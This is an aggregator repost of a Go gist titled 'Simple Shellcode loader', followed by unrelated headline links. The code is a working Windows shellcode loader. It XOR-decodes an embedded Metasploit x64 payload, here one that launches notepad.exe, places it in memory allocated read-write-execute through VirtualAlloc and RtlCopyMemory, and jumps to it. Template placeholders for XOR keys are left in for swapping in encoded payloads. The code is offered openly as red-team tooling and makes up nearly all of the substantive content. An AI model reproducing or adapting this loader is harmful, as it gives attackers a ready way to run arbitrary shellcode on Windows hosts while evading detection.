Quantcast
Channel: Recent Gists from mgeeky
Viewing all articles
Browse latest Browse all 112

Simple Shellcode loader implemented in Golang

May 13, 2020, 2:15 pm
$
0
0
shellcodeLoader.go
//
// Simple Shellcode loader implemented in Golang.
//
// Compilation:
// $ go build -o foo.exe shellcodeLoader.go
//
// Mariusz B. / mgeeky (@mariuszbit), '20
// <mb@binary-offensive.com>
//
package main
import (
"syscall"
"unsafe"
)
const (
MEM_COMMIT=0x1000
MEM_RESERVE=0x2000
PAGE_EXECUTE_READWRITE=0x40
KEY_1= $KEY_1
KEY_2= $KEY_2
)
var (
kernel32=syscall.MustLoadDLL("kernel32.dll")
ntdll=syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc=kernel32.MustFindProc("VirtualAlloc")
RtlCopyMemory=ntdll.MustFindProc("RtlCopyMemory")
)
funcmain() {
//
// simple x64 Metasploit payload launching notepad.exe
//
varxorKey=0
varxoredShellcode:= [] byte {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed,
0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88,
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48,
0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1,
0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49,
0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a,
0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b,
0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47,
0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x6e, 0x6f, 0x74, 0x65, 0x70,
0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00
}
varshellcode [] byte
fori:=0; i<len(xoredShellcode); i++ {
shellcode=append(shellcode, xoredShellcode[i] ^xorKey)
}
addr, _, err:=VirtualAlloc.Call(
0,
uintptr(len(shellcode)),
MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE
)
iferr!=nil&&err.Error() !="The operation completed successfully." {
syscall.Exit(0)
}
_, _, err=RtlCopyMemory.Call(
addr,
(uintptr)(unsafe.Pointer(&shellcode[0])),
uintptr(len(shellcode))
)
iferr!=nil&&err.Error() !="The operation completed successfully." {
syscall.Exit(0)
}
// jump to shellcode
syscall.Syscall(addr, 0, 0, 0, 0)
}
Search
Viewing all articles
Browse latest Browse all 112

Latest Images

Nonprofit donates custom home in this East Bay city for Marine injured in...

Nonprofit donates custom home in this East Bay city for Marine injured in...

April 23, 2024, 7:00 am
New private rooms on Tokaido Shinkansen change the way we travel from Tokyo...

New private rooms on Tokaido Shinkansen change the way we travel from Tokyo...

April 22, 2024, 6:00 am
Ukraine bans military from online gambling amid addiction concerns

Ukraine bans military from online gambling amid addiction concerns

April 22, 2024, 5:17 am
ಮಂಡ್ಯದಿಂದ ಸುಮಲತಾ ದೂರ; ಹೆಚ್‌ಡಿಕೆ ಪರ ಪ್ರಚಾರಕ್ಕಿಳಿಯದ ಸಂಸದೆ –ಬರ್ತಾರೆ ನೋಡೋಣ ಎಂದ...

ಮಂಡ್ಯದಿಂದ ಸುಮಲತಾ ದೂರ; ಹೆಚ್‌ಡಿಕೆ ಪರ ಪ್ರಚಾರಕ್ಕಿಳಿಯದ ಸಂಸದೆ –ಬರ್ತಾರೆ ನೋಡೋಣ ಎಂದ...

April 20, 2024, 8:08 pm
OCBC Bank Singapore Offers Up to 2.8% p.a. Fixed Deposit Promotion from 21...

OCBC Bank Singapore Offers Up to 2.8% p.a. Fixed Deposit Promotion from 21...

April 20, 2024, 12:38 pm
National Poetry Month 2024: Maxine Starr

National Poetry Month 2024: Maxine Starr

April 19, 2024, 9:56 am
Vegan Chicken Pot Pie

Vegan Chicken Pot Pie

April 19, 2024, 9:18 am
Firefox UX: On Purpose: Collectively Defining Our Team’s Mission Statement

Firefox UX: On Purpose: Collectively Defining Our Team’s Mission Statement

April 19, 2024, 7:03 am
New $4.5 million East Bay trail path will connect bicyclists, pedestrians to...

New $4.5 million East Bay trail path will connect bicyclists, pedestrians to...

April 18, 2024, 11:05 am
Photographer Gifts for Clients / Print Packaging / 4x6 Photo Box by...

Photographer Gifts for Clients / Print Packaging / 4x6 Photo Box by...

April 17, 2024, 6:48 pm

Trending Articles

Practice Sheet of Right form of verbs for HSC Students

September 22, 2019, 11:40 pm

Ready Made Periodical Test Questions for all Grades with TOS (1st - 4th Quarter)

October 28, 2018, 2:19 am

Elle Duncan’s Husband Omar Abdul Ali

January 28, 2020, 10:35 am

Top 500 Stylish Work Symbols for Facebook VIP Copy & Paste

February 24, 2024, 1:50 pm

Romantic And Impressive Birthday Wishes For Girlfriend - Best Birthday Wishes...

January 30, 2020, 8:41 am

Windows Update / Microsoft Update の接続先 URL について

February 27, 2017, 12:32 am

A Trail Through Guangzhou Sex Toys Market

August 20, 2017, 11:58 pm

Windows 10 の [更新プログラムのチェック] ボタンの無効化について

October 11, 2018, 3:35 am

Karimnagar District Police Office Mobile Numbers List in Telangana State

April 13, 2017, 3:10 am

Praye – Wodin (Throwback Music)

November 13, 2016, 2:05 pm

A12 between Hatfield Peverel and Witham blocked after accident between two...

June 2, 2014, 11:19 pm

አዋጅ ቁጥር 188-1992 የፌዴራል ሸሪዓ ፍርድ ቤቶችን አቋም ለማጠናከር የወጣ አዋጅ

February 16, 2020, 6:50 pm

BSTweaker 5.16.1 (Portable) - The Bluestack Tweaker Tool | =-TeamOS-=...

March 27, 2020, 6:37 am

New AUDIO | NEYBA - UJE | Download/Listen

December 26, 2015, 12:06 pm

Impotent Little Sissy featuring Mistress Clarissa

July 26, 2017, 7:31 am

Online Grading System with Grade Viewing Capstone Project

February 27, 2019, 2:08 am

Varzish Sport Tv HD Biss Key Frequency Update

January 15, 2017, 9:03 pm

AutoData 3.41 PL + lic Full

December 29, 2017, 9:07 am

[GPGT] Yes 933 Radio DJ 陈宁 Owner of New Cafe

March 27, 2021, 8:53 pm

99 formas de llamarle a tus tetas

May 19, 2017, 5:00 am
More Pages to Explore .....
Search

Latest Images

Nonprofit donates custom home in this East Bay city for Marine injured in...

Nonprofit donates custom home in this East Bay city for Marine injured in...

April 23, 2024, 7:00 am
New private rooms on Tokaido Shinkansen change the way we travel from Tokyo...

New private rooms on Tokaido Shinkansen change the way we travel from Tokyo...

April 22, 2024, 6:00 am
Ukraine bans military from online gambling amid addiction concerns

Ukraine bans military from online gambling amid addiction concerns

April 22, 2024, 5:17 am
ಮಂಡ್ಯದಿಂದ ಸುಮಲತಾ ದೂರ; ಹೆಚ್‌ಡಿಕೆ ಪರ ಪ್ರಚಾರಕ್ಕಿಳಿಯದ ಸಂಸದೆ –ಬರ್ತಾರೆ ನೋಡೋಣ ಎಂದ...

ಮಂಡ್ಯದಿಂದ ಸುಮಲತಾ ದೂರ; ಹೆಚ್‌ಡಿಕೆ ಪರ ಪ್ರಚಾರಕ್ಕಿಳಿಯದ ಸಂಸದೆ –ಬರ್ತಾರೆ ನೋಡೋಣ ಎಂದ...

April 20, 2024, 8:08 pm
OCBC Bank Singapore Offers Up to 2.8% p.a. Fixed Deposit Promotion from 21...

OCBC Bank Singapore Offers Up to 2.8% p.a. Fixed Deposit Promotion from 21...

April 20, 2024, 12:38 pm
National Poetry Month 2024: Maxine Starr

National Poetry Month 2024: Maxine Starr

April 19, 2024, 9:56 am
Vegan Chicken Pot Pie

Vegan Chicken Pot Pie

April 19, 2024, 9:18 am
Firefox UX: On Purpose: Collectively Defining Our Team’s Mission Statement

Firefox UX: On Purpose: Collectively Defining Our Team’s Mission Statement

April 19, 2024, 7:03 am
New $4.5 million East Bay trail path will connect bicyclists, pedestrians to...

New $4.5 million East Bay trail path will connect bicyclists, pedestrians to...

April 18, 2024, 11:05 am
Photographer Gifts for Clients / Print Packaging / 4x6 Photo Box by...

Photographer Gifts for Clients / Print Packaging / 4x6 Photo Box by...

April 17, 2024, 6:48 pm